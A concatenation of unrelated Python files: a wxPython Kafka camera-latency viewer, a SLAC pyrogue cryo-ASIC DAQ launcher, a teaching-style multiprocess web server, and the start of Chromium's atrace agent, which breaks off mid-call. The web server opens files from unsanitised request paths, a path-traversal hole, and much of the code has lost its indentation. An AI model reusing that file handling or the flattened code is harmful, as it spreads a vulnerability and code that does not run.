bmp_background = wx.Image(background_image, wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.bitmap1 = wx.StaticBitmap(self, -1, bmp_background, (0, 0))
parent.SetTitle('consumer application')
self.font = wx.Font(25, wx.DEFAULT, wx.NORMAL, wx.NORMAL)
self.flashingText1 = wx.StaticText(self, label = 'Phaya Thai - 1', pos = (530, 610))
self.flashingText2 = wx.StaticText(self, label = 'Phaya Thai - 2', pos = (950, 610))
self.flashingText3 = wx.StaticText(self, label = 'Phaya Thai - 3', pos = (1360, 610))
self.flashingText4 = wx.StaticText(self, label = 'Phaya Thai - 4', pos = (530, 360))
self.flashingText5 = wx.StaticText(self, label = 'Phaya Thai - 5', pos = (950, 360))
self.flashingText6 = wx.StaticText(self, label = 'Phaya Thai - 6', pos = (1360, 360))
self.flashingText1.SetForegroundColour('red')
self.flashingText2.SetForegroundColour('red')
self.flashingText3.SetForegroundColour('red')
self.flashingText4.SetForegroundColour('red')
self.flashingText5.SetForegroundColour('red')
self.flashingText6.SetForegroundColour('red')
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.update, self.timer)
self.timer.Start(50)
# self.timer.Start(200)
def save_list_pi1():
global latency_list_of_pi1
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
# threading.Timer(300.0, save_list_pi1).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi1 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi1, f)
# f.close()
threading.Timer(300.0, save_list_pi1).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi1 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi1, fp)
# fig, ax = plt.subplots()
#
# ax.plot(latency_list_of_pi1)
#
# ax.set(title="Latency per image vs messages (PhayaThai-1) at Local broker 2")
#
# ax.set(xlabel="Number of messages from PhayaThai-1", ylabel="Latency in ms")
#
# plt.show()
latency_list_of_pi1 *= 0
def save_list_pi2():
global latency_list_of_pi2
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_list_pi2).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi2 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi2, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi2 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi2, fp)
latency_list_of_pi2 *= 0
def save_list_pi3():
global latency_list_of_pi3
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_list_pi3).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi3 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi3, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi3 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi3, fp)
latency_list_of_pi3 *= 0
def save_list_pi4():
global latency_list_of_pi4
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_list_pi4).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi4 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi4, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi4 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi4, fp)
latency_list_of_pi4 *= 0
def save_list_pi5():
global latency_list_of_pi5
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_list_pi5).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi5 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi5, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi5 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi5, fp)
latency_list_of_pi5 *= 0
def save_list_pi6():
global latency_list_of_pi6
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_list_pi6).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi6 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi6, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi6 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi6, fp)
latency_list_of_pi6 *= 0
def save_loss_list_pi1():
global image_list_pi1
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
# threading.Timer(300.0, save_loss_list_pi1).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi1 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi1, f)
# f.close()
threading.Timer(300.0, save_loss_list_pi1).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi1 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi1, fp)
image_list_pi1 *= 0
def save_loss_list_pi2():
global image_list_pi2
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_loss_list_pi2).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi2 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi2, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi2 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi2, fp)
image_list_pi2 *= 0
def save_loss_list_pi3():
global image_list_pi3
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_loss_list_pi3).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi3 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi3, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi3 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi3, fp)
image_list_pi3 *= 0
def save_loss_list_pi4():
global image_list_pi4
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_loss_list_pi4).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi4 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi4, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi4 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi4, fp)
image_list_pi4 *= 0
def save_loss_list_pi5():
global image_list_pi5
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_loss_list_pi5).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi5 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi5, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi5 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi5, fp)
image_list_pi5 *= 0
def save_loss_list_pi6():
global image_list_pi6
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_loss_list_pi6).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi6 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi6, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi6 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi6, fp)
image_list_pi6 *= 0
def save_send_time_list_pi1():
global unix_timestamp_of_pi1
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi1).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi1 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi1, fp)
unix_timestamp_of_pi1 *= 0
def save_send_time_list_pi2():
global unix_timestamp_of_pi2
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi2).start()
            with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi2 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi2, fp)
unix_timestamp_of_pi2 *= 0
def save_send_time_list_pi3():
global unix_timestamp_of_pi3
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi3).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi3 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi3, fp)
unix_timestamp_of_pi3 *= 0
def save_send_time_list_pi4():
global unix_timestamp_of_pi4
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi4).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi4 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi4, fp)
unix_timestamp_of_pi4 *= 0
def save_send_time_list_pi5():
global unix_timestamp_of_pi5
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi5).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi5 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi5, fp)
unix_timestamp_of_pi5 *= 0
def save_send_time_list_pi6():
global unix_timestamp_of_pi6
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi6).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi6 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi6, fp)
unix_timestamp_of_pi6 *= 0
save_list_pi1()
save_list_pi2()
save_list_pi3()
save_list_pi4()
save_list_pi5()
save_list_pi6()
save_loss_list_pi1()
save_loss_list_pi2()
save_loss_list_pi3()
save_loss_list_pi4()
save_loss_list_pi5()
save_loss_list_pi6()
save_send_time_list_pi1()
save_send_time_list_pi2()
save_send_time_list_pi3()
save_send_time_list_pi4()
save_send_time_list_pi5()
save_send_time_list_pi6()
def update(self, event):
""""""
global local_consumer1
global local_consumer2
global local_consumer3
global local_consumer4
global local_consumer5
global local_consumer6
global my_queue1
global my_queue2
global my_queue3
global my_queue4
global my_queue5
global my_queue6
global latency_list_of_pi1
global latency_list_of_pi2
global latency_list_of_pi3
global latency_list_of_pi4
global latency_list_of_pi5
global latency_list_of_pi6
global unix_timestamp_of_pi1
global unix_timestamp_of_pi2
global unix_timestamp_of_pi3
global unix_timestamp_of_pi4
global unix_timestamp_of_pi5
global unix_timestamp_of_pi6
global image_list_pi1
global image_list_pi2
global image_list_pi3
global image_list_pi4
global image_list_pi5
global image_list_pi6
def kafka_image(consumer, out_queue, latency_list, timestamp, camera_name, image_list):
msg = next(consumer)
message = msg[6].split(' chula ')
now = int(round(time.time() * 1000))
sending_time = message[1]
time_diff = abs(now - int(float(sending_time)))
stream = cStringIO.StringIO(message[2])
out_queue.put(stream)
print('The latency of' + camera_name+ ' is ' + str(time_diff) + 'ms')
latency_list.append(str(time_diff))
timestamp.append(str(sending_time))
frame = message[0]
image_list.append(frame)
def show_image(default_consumer, my_queue, camera_name, latency_list, timestamp, image_list):
try:
kafka_image(default_consumer, my_queue, latency_list, timestamp, camera_name, image_list)
print('reading message from default '+ camera_name)
except:
# print('message is not found and showing previous image ' + camera_name)
pass
t1 = threading.Thread(target=show_image, args=(local_consumer1, my_queue1, 'PhayaThai-1',latency_list_of_pi1, unix_timestamp_of_pi1, image_list_pi1, ))
t2 = threading.Thread(target=show_image, args=(local_consumer2, my_queue2, 'PhayaThai-2',latency_list_of_pi2, unix_timestamp_of_pi2, image_list_pi2, ))
# t3 = threading.Thread(target=show_image, args=(local_consumer3, my_queue3, 'PhayaThai-3',latency_list_of_pi3, unix_timestamp_of_pi3, image_list_pi3, ))
t4 = threading.Thread(target=show_image, args=(local_consumer4, my_queue4, 'PhayaThai-4',latency_list_of_pi4, unix_timestamp_of_pi4, image_list_pi4, ))
# t5 = threading.Thread(target=show_image, args=(local_consumer5, my_queue5, 'PhayaThai-5',latency_list_of_pi5, unix_timestamp_of_pi5, image_list_pi5, ))
# t6 = threading.Thread(target=show_image, args=(local_consumer6, my_queue6, 'PhayaThai-6',latency_list_of_pi6, unix_timestamp_of_pi6, image_list_pi6, ))
t1.start()
t2.start()
# t3.start()
t4.start()
# t5.start()
# t6.start()
dc = wx.PaintDC(self)
try:
self.bmp1 = wx.BitmapFromImage(wx.ImageFromStream(my_queue1.get_nowait()))
dc.DrawBitmap(self.bmp1, 450, 630)
except:
pass
try:
self.bmp2 = wx.BitmapFromImage(wx.ImageFromStream(my_queue2.get_nowait()))
dc.DrawBitmap(self.bmp2, 860, 630)
except:
pass
# try:
# self.bmp3 = wx.BitmapFromImage(wx.ImageFromStream(my_queue3.get_nowait()))
# dc.DrawBitmap(self.bmp3, 1270, 630)
# except:
# pass
try:
self.bmp4 = wx.BitmapFromImage(wx.ImageFromStream(my_queue4.get_nowait()))
dc.DrawBitmap(self.bmp4, 450, 380)
except:
pass
# try:
# self.bmp5 = wx.BitmapFromImage(wx.ImageFromStream(my_queue5.get_nowait()))
# dc.DrawBitmap(self.bmp5, 860, 380)
# except:
# pass
# try:
# self.bmp6 = wx.BitmapFromImage(wx.ImageFromStream(my_queue6.get_nowait()))
# dc.DrawBitmap(self.bmp6, 1270, 380)
# except:
# pass
#######################################################################################
class MyFrame(wx.Frame):
""""""
# ---------------------------------------------------------------------------------
def __init__(self):
"""Constructor"""
wx.Frame.__init__(self, None, title="An image on a panel", size=(1920, 1080))
panel = MyPanel(self)
self.Show()
# ----------------------------------------------------------------------
if __name__ == "__main__":
app = wx.App(False)
frame = MyFrame()
app.MainLoop()
|
cryoDaqInit.py
|
#!/usr/bin/env python3
#-----------------------------------------------------------------------------
# Title : cryo DAQ top module (based on ePix HR readout)
#-----------------------------------------------------------------------------
# File : cryoDAQ.py evolved from evalBoard.py
# Created : 2018-06-12
# Last update: 2018-06-12
#-----------------------------------------------------------------------------
# Description:
# Rogue interface to cryo ASIC based on ePix HR boards
#-----------------------------------------------------------------------------
# This file is part of the rogue_example software. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue_example software, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import setupLibPaths
import pyrogue as pr
import pyrogue.utilities.prbs
import pyrogue.utilities.fileio
import pyrogue.interfaces.simulation
import pyrogue.gui
import rogue.hardware.pgp
import rogue.protocols
import surf
import surf.axi
import surf.protocols.ssi
from XilinxKcu1500Pgp3.XilinxKcu1500Pgp3 import *
import threading
import signal
import atexit
import yaml
import time
import argparse
import sys
#import testBridge
import ePixViewer as vi
import ePixFpga as fpga
try:
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
except ImportError:
from PyQt4.QtCore import *
from PyQt4.QtGui import *
# Set the argument parser
parser = argparse.ArgumentParser()
# Convert str to bool
argBool = lambda s: s.lower() in ['true', 't', 'yes', '1']
# Add arguments
parser.add_argument(
"--type",
type = str,
required = True,
help = "define the PCIe card type (either pgp-gen3 or kcu1500)",
)
parser.add_argument(
"--start_gui",
type = argBool,
required = False,
default = True,
help = "true to show gui",
)
parser.add_argument(
"--viewer",
type = argBool,
required = False,
default = True,
help = "Start viewer",
)
parser.add_argument(
"--verbose",
type = argBool,
required = False,
default = False,
help = "true for verbose printout",
)
# Add arguments
parser.add_argument(
"--initSeq",
type = int,
required = False,
default = 0,
help = "specify the inicialization sequence to be performed (0 means no initialization).",
)
# Get the arguments
args = parser.parse_args()
#############################################
START_VIEWER = args.viewer
print(args.viewer)
#############################################
# Add PGP virtual channels
if ( args.type == 'pgp-gen3' ):
# Create the PGP interfaces for ePix hr camera
pgpL0Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,0) # Data & cmds
pgpL0Vc1 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,1) # Registers for ePix board
pgpL0Vc2 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,2) # PseudoScope
pgpL0Vc3 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,3) # Monitoring (Slow ADC)
#pgpL1Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,0) # Data (when using all four lanes it should be swapped back with L0)
pgpL2Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',2,0) # Data
pgpL3Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',3,0) # Data
print("")
print("PGP Card Version: %x" % (pgpL0Vc0.getInfo().version))
elif ( args.type == 'kcu1500' ):
# Create the PGP interfaces for ePix hr camera
pgpL0Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+0, True) # Data & cmds
pgpL0Vc1 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+1, True) # Registers for ePix board
pgpL0Vc2 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+2, True) # PseudoScope
pgpL0Vc3 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+3, True) # Monitoring (Slow ADC)
#pgpL1Vc0 = rogue.hardware.data.DataCard('/dev/datadev_0',(0*32)+0) # Data (when using all four lanes it should be swapped back with L0)
pgpL2Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(2*32)+0, True) # Data
pgpL3Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(3*32)+0, True) # Data
elif ( args.type == 'SIM' ):
print('Sim mode')
rogue.Logging.setFilter('pyrogue.SrpV3', rogue.Logging.Debug)
simPort = 11000
pgpL0Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*0) # VC0
pgpL0Vc1 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*1) # VC1
pgpL0Vc2 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*2) # VC2
pgpL0Vc3 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*3) # VC3
pgpL2Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*2)+2*0) # L2VC0
pgpL3Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*3)+2*0) # L3VC0
elif ( args.type == 'dataFile' ):
print("Bypassing hardware.")
else:
raise ValueError("Invalid type (%s)" % (args.type) )
# Add data stream to file as channel 1 File writer
dataWriter = pyrogue.utilities.fileio.StreamWriter(name='dataWriter')
if ( args.type != 'dataFile' ):
pyrogue.streamConnect(pgpL0Vc0, dataWriter.getChannel(0x1))
pyrogue.streamConnect(pgpL0Vc2, dataWriter.getChannel(0x2))
cmd = rogue.protocols.srp.Cmd()
if ( args.type != 'dataFile' ):
pyrogue.streamConnect(cmd, pgpL0Vc0)
# Create and Connect SRP to VC1 to send commands
srp = rogue.protocols.srp.SrpV3()
if ( args.type != 'dataFile' ):
pyrogue.streamConnectBiDir(pgpL0Vc1,srp)
#############################################
# Microblaze console printout
#############################################
class MbDebug(rogue.interfaces.stream.Slave):
def __init__(self):
rogue.interfaces.stream.Slave.__init__(self)
self.enable = False
def _acceptFrame(self,frame):
if self.enable:
p = bytearray(frame.getPayload())
frame.read(p,0)
print('-------- Microblaze Console --------')
print(p.decode('utf-8'))
#######################################
# Custom run control
#######################################
class MyRunControl(pyrogue.RunControl):
def __init__(self,name):
pyrogue.RunControl.__init__(self,name, description='Run Controller ePix HR empty', rates={1:'1 Hz', 2:'2 Hz', 4:'4 Hz', 8:'8 Hz', 10:'10 Hz', 30:'30 Hz', 60:'60 Hz', 120:'120 Hz'})
self._thread = None
def _setRunState(self,dev,var,value,changed):
if changed:
if self.runState.get(read=False) == 'Running':
self._thread = threading.Thread(target=self._run)
self._thread.start()
else:
self._thread.join()
self._thread = None
def _run(self):
self.runCount.set(0)
self._last = int(time.time())
while (self.runState.value() == 'Running'):
delay = 1.0 / ({value: key for key,value in self.runRate.enum.items()}[self._runRate])
time.sleep(delay)
#self._root.ssiPrbsTx.oneShot()
self._runCount += 1
if self._last != int(time.time()):
self._last = int(time.time())
self.runCount._updated()
##############################
# Set base
##############################
class Board(pyrogue.Root):
def __init__(self, guiTop, cmd, dataWriter, srp, **kwargs):
super().__init__(name='cryoAsicGen1',description='cryo ASIC', **kwargs)
self.add(dataWriter)
self.guiTop = guiTop
self.cmd = cmd
@self.command()
def Trigger():
self.cmd.sendCmd(0, 0)
#if (self.EpixHRGen1Cryo.CryoAsic0.test.get() and dataWriter.frameCount.get()):
# pulserAmplitude = self.dataWriter.frameCount.get() #self.EpixHRGen1Cryo.CryoAsic0.Pulser.get()
# if pulserAmplitude%1024 == 1023:
# pulserAmplitude = 0
# else:
# pulserAmplitude += 1
# self.EpixHRGen1Cryo.CryoAsic0.Pulser.set(pulserAmplitude)
# Add Devices
if ( args.type == 'kcu1500' ):
coreMap = rogue.hardware.axi.AxiMemMap('/dev/datadev_0')
self.add(XilinxKcu1500Pgp3(memBase=coreMap))
self.add(fpga.EpixHRGen1Cryo(name='EpixHRGen1Cryo', offset=0, memBase=srp, hidden=False, enabled=True))
self.add(pyrogue.RunControl(name = 'runControl', description='Run Controller hr', cmd=self.Trigger, rates={1:'1 Hz', 2:'2 Hz', 4:'4 Hz', 8:'8 Hz', 10:'10 Hz', 30:'30 Hz', 60:'60 Hz', 120:'120 Hz'}))
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 0[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL0Vc0, dbgData)
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 1[{}]".format(0))
# if (args.verbose): pyrogue.streamTap(pgpL1Vc0, dbgData)
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 2[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL2Vc0, dbgData)
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 3[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL3Vc0, dbgData)
if (args.type == 'SIM'):
# Set the timeout
timeout_time = 100000000 # firmware simulation slow and timeout base on real time (not simulation time)
else:
# Set the timeout
timeout_time = 5000000 # 5.0 seconds default
# Create GUI
appTop = pyrogue.gui.application(sys.argv)
guiTop = pyrogue.gui.GuiTop(group='cryoAsicGui')
cryoAsicBoard = Board(guiTop, cmd, dataWriter, srp)
if ( args.type == 'dataFile' or args.type == 'SIM'):
cryoAsicBoard.start(pollEn=False, pyroGroup=None, timeout=timeout_time)
else:
cryoAsicBoard.start(pollEn=True, pyroGroup=None)
guiTop.addTree(cryoAsicBoard)
guiTop.resize(800,800)
# Viewer gui
if START_VIEWER:
onlineViewer = vi.Window(cameraType='cryo64xN')
onlineViewer.eventReader.frameIndex = 0
onlineViewer.setReadDelay(0)
pyrogue.streamTap(pgpL0Vc0, onlineViewer.eventReader)
if ( args.type != 'dataFile' ):
pyrogue.streamTap(pgpL0Vc2, onlineViewer.eventReaderScope)# PseudoScope
#pyrogue.streamTap(pgpL0Vc3, onlineViewer.eventReaderMonitoring) # Slow Monitoring
if ( args.type == 'dataFile' or args.type == 'SIM'):
print("Simulation mode does not initialize asic")
else:
#configure internal ADC
cryoAsicBoard.EpixHRGen1Cryo.FastADCsDebug.enable.set(True)
cryoAsicBoard.readBlocks()
cryoAsicBoard.EpixHRGen1Cryo.FastADCsDebug.DelayAdc0.set(15)
cryoAsicBoard.EpixHRGen1Cryo.FastADCsDebug.enable.set(False)
cryoAsicBoard.EpixHRGen1Cryo.Ad9249Config_Adc_0.enable.set(True)
cryoAsicBoard.readBlocks()
cryoAsicBoard.EpixHRGen1Cryo.Ad9249Config_Adc_0.InternalPdwnMode.set(3)
cryoAsicBoard.EpixHRGen1Cryo.Ad9249Config_Adc_0.InternalPdwnMode.set(0)
cryoAsicBoard.EpixHRGen1Cryo.Ad9249Config_Adc_0.OutputFormat.set(0)
cryoAsicBoard.readBlocks()
cryoAsicBoard.EpixHRGen1Cryo.Ad9249Config_Adc_0.enable.set(False)
cryoAsicBoard.readBlocks()
# executes the requested initialization
cryoAsicBoard.EpixHRGen1Cryo.InitCryo(args.initSeq)
# Create GUI
if (args.start_gui):
appTop.exec_()
# Close window and stop polling
cryoAsicBoard.stop()
exit()
|
web_server_2.py
|
#!/usr/bin/python3
# file: multiprocess_web_server.py
# Created by Guang at 19-7-19
# description:
# -*- coding: utf-8 -*-
import multiprocessing
import socket
import re
import time
import sys
sys.path.insert(0, "../../")
from mini_web.framework import mini_frame_2
class WSGIServer(object):
def __init__(self, ip, port):
        # 1. Create the socket
self.listen_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listen_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # 2. Bind the ip and port
self.local_addr = (ip, port)
self.listen_server.bind(self.local_addr)
        # 3. Switch from active to passive mode (listen)
self.listen_server.listen(128)
def service_client(self, new_socket):
"""为这个客户端返回数据"""
# 1.接收浏览器发送过来的请求, 即HTTP请求
# GET / HTTP/1.1
request = new_socket.recv(1024).decode('utf-8')
# print("-" * 100)
        request_lines = request.splitlines()  # when the client closes the connection, recv returns an empty string and unblocks; splitlines then yields an empty list
if not request_lines:
return
print(request_lines[0])
# print(request_lines)
# GET /index.html HTTP/1.1
# GET POST DELETE
file_name = ""
ret = re.match(r'[^/]+(/[^ ]*)', request_lines[0])
if ret:
file_name = ret.group(1)
# print("*" * 50, file_name)
if file_name == "/":
file_name = "/index.html"
        # 2. Return data in HTTP format
        # 2.1 Static vs. dynamic resources: assume anything ending in .py is a dynamic resource
if not file_name.endswith(".py"):
try:
f = open("./html" + file_name, 'rb')
except Exception as e:
response = "HTTP/1.1 404 NOT FOUND\r\n"
response += "\r\n"
response += "----------file not found --------"
new_socket.send(response.encode("utf-8"))
else:
html_content = f.read()
f.close()
                # 2.1 Prepare the data to send to the browser -- header
response = "HTTP/1.1 200 OK\r\n"
response += "\r\n"
                # 2.2 Prepare the data to send to the browser -- body
                # response += "hahaha"
                # Send the response header to the browser
new_socket.send(response.encode("utf-8"))
                # Send the response body to the browser
new_socket.send(html_content)
else:
            # 2.2 Request a dynamic resource
header = "HTTP/1.1 200 OK\r\n"
header += "\r\n"
# body = "This is a dynamic source web_app \r\n %s" % time.ctime()
# if file_name == "/login.py":
# body = mini_frame_2.login()
# elif file_name == "/register.py":
# body = mini_frame_2.register()
body = mini_frame_2.application(file_name)
response = header + body
new_socket.send(response.encode("utf-8"))
        # Must close once more here; this closes the underlying file descriptor held by this process
new_socket.close()
def runserver(self):
"""主函数: 整体控制"""
while True:
            # 4. Wait for a new client connection
new_socket, client_addr = self.listen_server.accept()
            # 5. Serve this client
p = multiprocessing.Process(target=self.service_client, args=(new_socket, ))
p.start()
            # In this process-based concurrent server, new_socket.close() must also be called here; reason: the parent and child each hold a copy of the file descriptor (fd)
new_socket.close()
        # Close the listening socket
self.listen_server.close()
if __name__ == '__main__':
ip = ''
port = 8888
wsgi_server = WSGIServer(ip, port)
wsgi_server.runserver()
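
# --- Usage note (added for illustration; paths and port are assumptions) ---
# With the server running on port 8888 and a ./html directory next to it:
#   curl http://127.0.0.1:8888/            -> serves ./html/index.html
#   curl http://127.0.0.1:8888/login.py    -> dispatched to mini_frame_2.application("/login.py")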
|
atrace_agent.py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import py_utils
import re
import sys
import threading
import zlib
from devil.android import device_utils
from devil.android.sdk import version_codes
from py_trace_event import trace_time as trace_time_module
from systrace import trace_result
from systrace import tracing_agents
from systrace import util
# Text that ADB sends, but does not need to be displayed to the user.
ADB_IGNORE_REGEXP = r'^capturing trace\.\.\. done|^capturing trace\.\.\.'
# The number of seconds to wait on output from ADB.
ADB_STDOUT_READ_TIMEOUT = 0.2
# The adb shell command to initiate a trace.
ATRACE_BASE_ARGS = ['atrace']
# If a custom list of categories is not specified, traces will include
# these categories (if available on the device).
DEFAULT_CATEGORIES = 'sched,freq,gfx,view,dalvik,webview,'\
'input,disk,am,wm,rs,binder_driver'
# The command to list trace categories.
LIST_CATEGORIES_ARGS = ATRACE_BASE_ARGS + ['--list_categories']
# Minimum number of seconds between displaying status updates.
MIN_TIME_BETWEEN_STATUS_UPDATES = 0.2
# ADB sends this text to indicate the beginning of the trace data.
TRACE_START_REGEXP = r'TRACE\:'
# Plain-text trace data should always start with this string.
TRACE_TEXT_HEADER = '# tracer'
_FIX_THREAD_IDS = True
_FIX_MISSING_TGIDS = True
_FIX_CIRCULAR_TRACES = True
def list_categories(config):
"""List the possible trace event categories.
This function needs the tracing config since it needs to get the serial
number of the device to send a command to.
Args:
config: Tracing config.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
categories = devutils.RunShellCommand(
